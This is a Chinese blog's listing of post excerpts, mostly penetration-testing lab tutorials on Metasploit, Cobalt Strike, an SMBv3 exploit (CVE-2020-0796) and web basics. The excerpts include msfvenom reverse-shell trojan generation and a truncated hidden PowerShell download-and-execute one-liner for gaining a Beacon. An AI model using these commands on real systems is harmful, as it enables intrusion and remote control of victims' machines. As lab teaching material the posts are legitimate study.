- 博客(13)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 内网渗透 -- 提升权限(利用提权漏洞)
沉默不是没有情绪,是感觉没有再说的意义。。。。---- 网易云热评环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.137一、生成木马1、查看Windows下可利用的payloadsmsfvenom -l payloads | grep windows | grep tcp2、选择windows/meterpreter/reverse_tcp并生成木马-p 选择一个payload...
2020-06-27 23:16:26
834
原创 内网渗透 -- 添加域服务
同在一座城市,为何好久不见,你可能真的在忙,但我肯定也不重要了。。。。---- 网易云热评环境:win2008R2X64一、打开服务器管理器二、右击角色,添加角色,下一步三、选择ActiveDIrector域服务,一直点击下一步,最后点击安装四、安装成功,点击中间的蓝色链接,启动域服务安装向导。五、点击下一步六、选择在新林中新建域,下一步七、指定目录林根级域aiyou.com,下一步八、选择林功能级别,下一步九、...
2020-06-24 22:19:05
392
原创 Cobaltstrike4.0系列 -- Beacon HTTP
讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。---- 网易云热评一、新建Listeners,点击save二、利用powershell命令获取目标主机的Beacon1、选择Attacks--WebDrive-by--ScriptedwebDelivery2、选择添加的Listener,点击Launch3、获取powershell的单行指令powershell.exe -nop -w hidden -c "IEX ((ne...
2020-06-23 22:44:11
917
原创 Cobaltstrike4.0系列 -- 基本流程
有的话,听了就听了,受伤的,往往是当真的。。。---- 网易云热评一、创建监听器1、点击 Cobalt Strike -> Listeners->Add,其中内置了八个Payload,wndows/beacon_dns/reverse_dns_txtwindows/beacon_http/reverse_httpwindows/beacon_https/reverse_httpswindows/beacon_bind_pipewindows/beacon_tcp.
2020-06-21 22:15:07
1715
1
原创 Cobaltstrike4.0系列 -- 界面介绍
越长大越不勇敢,连追求自己想要的东西,都成了一种遮掩。。。---- 网易云热评环境:kali2020、win7一、启动服务端./teamserver服务器ip(kali) 密码(客户端连接服务器的密码)./teamserver 192.168.1.133 aiyou二、启动客户端win7中,运行start.bat,输入服务器ip、端口、用户名(随便输入)、密码(上面设置的密码),点击connect三、菜单介绍1、CobaltStrikeNew Con...
2020-06-21 14:45:12
1127
原创 从建站到拿站 -- Mysql数据库(一)
我可以一个人,坐地铁一直到终点,也可以,一个人看电影到凌晨六点。你以为我过的孤独,我只是想过的舒服。。。---- 网易云热评一、命令行连接数据库mysql -uroot -proot //指定用户名和密码二、数据库语句1、数据库操作showdatabases;显示数据库create database jay;//新建数据库dropdatabasejay;//删除数据库rename database jay to jay1;//修改数据库2、表操作...
2020-06-12 23:13:46
337
原创 从建站到拿站 -- JS基础
喝酒喝到吐的是我,在家大门不出二门不迈的也是我,仗义疏财的是我,扣到几块钱也舍不得花的也是我,放肆到骚话满篇的是我,谨慎到沉默寡言的也是我,我自己都不知道自己是什么人。。。---- 网易云热评提示:本节主要为以后XSS漏洞打基础。一、简介JavaScript 是一种轻量级的编程语言,可插入 HTML 页面的编程代码。二、变量变量必须以字母开头,也能以 $ 和 _ 符号开头,大小写敏感(y 和 Y 是不同的变量)var a=123三、数据类型var x;x为und...
2020-06-12 21:36:58
206
原创 从建站打拿站 -- PHP(文件上传)
李白写过那么多诗,他自己会背么?像李白那么不羁的人,估计写完就忘了,放不下的是我们俗人自己。。。---- 网易云热评一、上传文件1、新建一个html网页,上传文件enctype 属性规定了在提交表单时要使用哪种内容类型。在表单需要二进制数据时,比如文件内容,请使用 "multipart/form-data"<!DOCTYPE html><!-- 有助于浏览器中正确显示网页 --><html><!-- html页面开始标签 --...
2020-06-07 22:56:04
258
原创 从建站打拿站 -- PHP(登录和注册)
小孩子才会喝的一塌糊涂 而我必须带着钥匙拿好手机记住回家的路。。。。---- 网易云热评在HTML基础中,做了两张静态页面(登录和注册),现在我们配合PHP动态页面进行操作。一、登录页面(GET)1、action属性修改为"../php/dl.php":将表单内容提交到该页面执行2、method属性修改为"get":提交方式是GET方式<!DOCTYPE html><!-- 有助于浏览器中正确显示网页 --><html><!--...
2020-06-06 23:21:23
308
原创 从建站到拿站 -- PHP判断循环及函数
一个人自愈能力越强,才有可能接近幸福,做一个沉默寡言,心却有一片海的人,成熟的稻谷都是低头的,各自努力。。。---- 网易云热评一、判断语句if..else..<?php$a=10;if($a>10){echo "a>10";}elseif($a=10){echo "a=10";}else{echo "a<10";}?>switch<?php$a=12;switch (...
2020-06-06 23:16:08
194
原创 从建站到拿站 -- PHP基础
慌慌张张,不过图碎银几两,偏偏这碎银几两,能解万种惆怅。。。。---- 网易云热评一、PHP简介PHP即超文本预处理器,是一种脚本语言,可在不同平台上执行,在服务器上执行后,将结果以HTML形式返回给浏览器二、一个简单的PHP页面<!DOCTYPE html><meta charset="UTF-8"><!-- UTF-8编码--><html><body><h1>《说好不哭》</h1&g...
2020-06-04 22:52:34
390
原创 从建站到拿站 -- HTML和CSS基础
一线城市容不下自己的肉身,三四线城市容不下自己的灵魂。。。---- 网易云热评一、Form表单简介表单是允许用户在表单中输入内容,比如用户名和密码,并将信息提交到服务器二、简单表单action:将输入框的内容提交到那服务器method:提交方式,GET方式(有长度限制)和POST方式<!DOCTYPE html><!-- 有助于浏览器中正确显示网页 --><html><!-- html页面开始标签 --><h...
2020-06-04 22:48:33
198
原创 Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell
会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。---- 网易云热评本篇内容来自雷石安全实验室。一、漏洞描述:该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。二、测试环境及工具:windows10 1903 64位下载:ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|490547.
2020-06-04 22:35:23
2655
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人